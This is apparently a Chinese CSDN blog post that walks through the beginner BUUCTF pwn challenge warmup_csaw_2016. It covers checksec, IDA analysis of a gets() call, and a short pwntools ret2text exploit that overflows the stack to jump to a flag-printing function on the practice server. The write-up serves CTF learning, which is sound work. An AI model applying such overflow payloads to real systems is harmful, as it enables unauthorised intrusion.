BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量1k 收藏 15
点赞数 21
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58410275/article/details/138091718
版权

目录

一、基本思路

1.checksec一下

2.ida分析一下

​二、构造exp

1.exp代码展示

2.运行结果

三、小结一下

一、基本思路

1.checksec一下

        还是一道没有开启任何保护的题目,暂且归类为简单题

2.ida分析一下

        我们看到主函数朴实无华地给出了危险函数gets(),同时还有主函数直接returngets的内容,这里思路就到达ret2text的线上

        然后我们再翻一翻,找一找,有个sub_40060D的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了

二、构造exp

1.exp代码展示

#!/usr/bin/python3              ##这个是我使用虚拟机里面python的地址,大家自行调整
 
from pwn import*
 
io=remote("node5.buuoj.cn",端口)
payload=b'a'*(4*16+8)+p64(0x40060D)
io.sendline(payload)
io.interactive()

         解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充

2.运行结果

        由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互

三、小结一下

        总的来说,这个题目的漏洞十分明显并且方便利用,对于刚入门来说还是非常友好了。

糖醋鸽子
关注
  • 21
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF-warmup_csaw_2016新手pwner成长日记3)(3)
2401_84968612的博客
05-12 305
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
buuctf----warmup_csaw_2016
Nike_name的博客
06-14 246
get栈溢出
BUUCTF-warmup_csaw_2016新手pwner成长日记3)(2)
2401_84968582的博客
05-12 250
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUUCTF-ciscn_2019_n_1 (新手pwner成长日记4)
weixin_58410275的博客
04-27 559
NX不可执行,其余保护没有开启,shellcode方法不可用,不过没关系,这个题考点不在这里。
BUUCTF-ciscn_2019_c_1(新手pwner成长日记5)
weixin_58410275的博客
04-27 1636
函数的真实地址 = 基地址 + 偏移地址最后,我们来看一下做题思路1.首先寻找一个函数的真实地址(比如这个题目中puts是出现过的函数)构造合理的payload1,劫持程序的执行流程,得到puts函数的真实地址,并重新回到main函数开始的位置。2.找到puts函数的真实地址后,根据其最后三位,可以判断出libc库的版本(这里博主也不是很明白,就不乱讲误人子弟了,这里我采用了挨个试的办法)。3.根据libc库的版本可以很容易的确定puts函数的偏移地址。4.计算基地址。
BUUCTF-test your nc(新手pwner成长日记
weixin_58410275的博客
04-22 1616
目录前言一、准备工作1.虚拟机的安装2.pwn环境配置3.一点捷径二、基本思路1.checksec2.IDA分析总结新手上路,还有很多不会的地方,如有错误还请师傅们多多指正。以下内容均为个人自学的理解,不作为专业规范,仅供参考。这道题目在CTF界也被称为瑞士军刀(主要原因在于nc命令的使用,短小精悍,功能实用得此称号)其解题只需要一条简单的nc指令即可。后续的题目不会再只是简简单单利用终端输入指令,需要我们构建exp对靶机“pwn”一下达成我们的目的,这一点我们后续再聊。
BUUCTF-rip(新手pwner成长日记2)
weixin_58410275的博客
04-22 591
什么保护都没有开启,目测是个简单题,其实就是个简单题,初步判定栈溢出的ret2text吧,后续再看情况。
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1485
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
[BUUCTF-pwn] ciscn_2019_ne_1
weixin_52640415的博客
01-08 233
2.27-i386 的堆很少见 4小时才完成,前边想得有点乱了。 堆块的结构: 总管理块0x31:10个块指针 头块0x21:ptr_comment,ptr_name,XXX,XXX两个没用的东西 name块:大小自定不能太大,这个块由scanf %ns 读入,多加\0 这个很隐蔽,一时没发现浪费不少时间。 comment块:0x8c 这个块由read读入后边不带\0,将来用于泄露libc 还有个改名的菜单,转了好...
BUUCTF:PicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1353
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢出,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。 第一次溢出: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
Pi-Pwner:用于Raspbian Stretch的Pentesting Suite Deployer
05-12
Pi-Pwner是一个bash脚本,它将在运行Raspbian Stretch的Raspberry Pi上加载全面的测试工具和脚本套件。 在部署结束时,您将拥有一组工具,这些工具将在渗透测试参与期间提供帮助,以执行信息收集,嗅探,欺骗,无线...
IE10_11无法启动V2.04.1
01-22
IE10_11无法启动V2.04.1,帮你一键解决IE10和IE11无法启动的问题
Flash插件修复工具Win8.1_10 V2.34.1
01-22
Flash插件修复工具Win8.1_10 V2.34.1,一键修复Flash插件的各种问题。
jdk-8u221-windows-x64.exe(含有md5校验确保安装成功).7z
09-12
Java开发工具包(Java Development Kit,简称JDK)是Oracle公司发布的用于开发和运行Java程序的软件工具包。本主题涉及的是JDK的8u221版本,专为Windows 64位操作系统设计,即x64架构。这个特定的安装包文件名为"jdk...
OneDrive卸载工具
01-06
3. **安全无害**:作为官方提供的卸载工具,它不会对系统其他部分造成影响,可以放心使用。 4. **节省时间**:相比于手动查找和删除OneDrive的各个部分,这个工具能快速完成卸载过程,节省用户时间。 5. **防止...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8359
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1488
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
基于JAVA的厨艺交流平台(Vue.js+SpringBoot+MySQL)
08-01
基于Vue.js和SpringBoot的厨艺交流平台是一个功能丰富的在线社区,旨在为烹饪爱好者提供一个分享和学习烹饪技巧的平台。该平台分为管理后台和用户网页端,支持管理员和普通用户两种角色。管理后台提供对菜谱分类、菜谱信息、食材信息、商品信息和美食日志模块的全面管理功能,包括添加、编辑、删除和查询等操作。用户网页端则为用户提供了一个友好的界面,可以浏览和搜索各种菜谱,查看食材和商品信息,发表自己的美食日志,与其他用户互动交流。整个平台采用现代化的前端技术和后端框架,保证了良好的用户体验和高效的数据处理能力。 演示录屏:https://www.bilibili.com/video/BV1uz42197zu 配套教程:https://www.bilibili.com/video/BV1pW4y1P7GR
层次分析法数学建模论文.doc
最新发布
08-01
层次分析法数学建模论文
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值